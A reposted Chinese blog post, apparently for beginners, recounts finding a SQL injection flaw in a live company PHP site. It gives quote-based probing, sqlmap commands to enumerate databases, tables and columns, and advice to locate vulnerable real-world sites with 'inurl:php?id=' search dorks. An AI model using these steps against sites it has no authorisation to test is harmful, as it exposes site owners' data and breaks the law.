| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> sql注入漏洞搜寻,记一次sql注入高危漏洞 -> 正文阅读 |
|
[PHP知识库]sql注入漏洞搜寻,记一次sql注入高危漏洞 |
前言: 学了sql注入咋找漏洞呢?只会靶场的sql注入咋办呢?实战的sqlmap就是显示参数不可注入跑不出来,这sql注入到底还存不存在网络上呢?还是我的sqlmap不会用呢? 这些一定是入门的小白对sql注入的一些疑问吧,这篇文章,先展示sql注入的发现,然后是sqlmap的实战使用,最后再讲讲一些我目前的经验,绝对能让小白脱离sql注入靶场,从而投入实战中 1、发现过程 直接一个单引号插后边,看到没,报错了 为了进一步验证,然后加熟悉的and 1=1 ,and 1=2,前者插入正常,后者异常 2、然后还用问吗?直接丢sqlmap跑,先采用最原始的命令验证sql注入的存在,跑出来了,就获取库,表,字段吧 (1)python sqlmap.py -u".......php?id=356"? ? ? ? ? ? ? ? 验证sql注入 (2)python sqlmap.py -u".......php?id=356" -dbms mysql -dbs? ? ? ? ?获取库 (3)python sqlmap.py -u"......php?id=356" -dbms mysql -D 库名?-tables? ? ? ? ?获取表 ? (4)python sqlmap.py -u"......php?id=356" -dbms mysql -D 库名 -T 表名 -columns,到获取字段这一步即可,不要查看字段下的数据,否则就是违法 ?3、最后就交补天了,资产为几百万的小公司而已,这个sql注入可导致他的所有数据泄露,包括数据库连接用户名密码 4、经验总结 (1)小白把一些常规的web靶场如pikachu,dvwa,xss-labs,sql-labs练过后(个人没练完,只是针对性挑着练,怎么针对法,可以评论区问我),就找实战,用上特定搜索法,比如inurl:php?id=31等找sql注入等,这种搜索技巧其他文章有,找找就行,我这里就不啰嗦了,然后你按我上述流程,二十来个找一个还是行的 (2)关于sqlmap的用法,我把我自己整理的方法放出来 (链接:https://pan.baidu.com/s/1ixFaEMhSKA21algws2MXZA?提取码:6666? 先拿sqlmap对着靶场把常用指令和sqlmap注入流程熟悉一下,再拿去实战,不然实战中的sqlmap使用的会让你怀疑人生,一堆红色警告,然后跑大半天了还告诉你参数不可注入 (3)关于有什么学习路上的疑问,可评论区留下,我会回答 |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/26 16:31:44- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |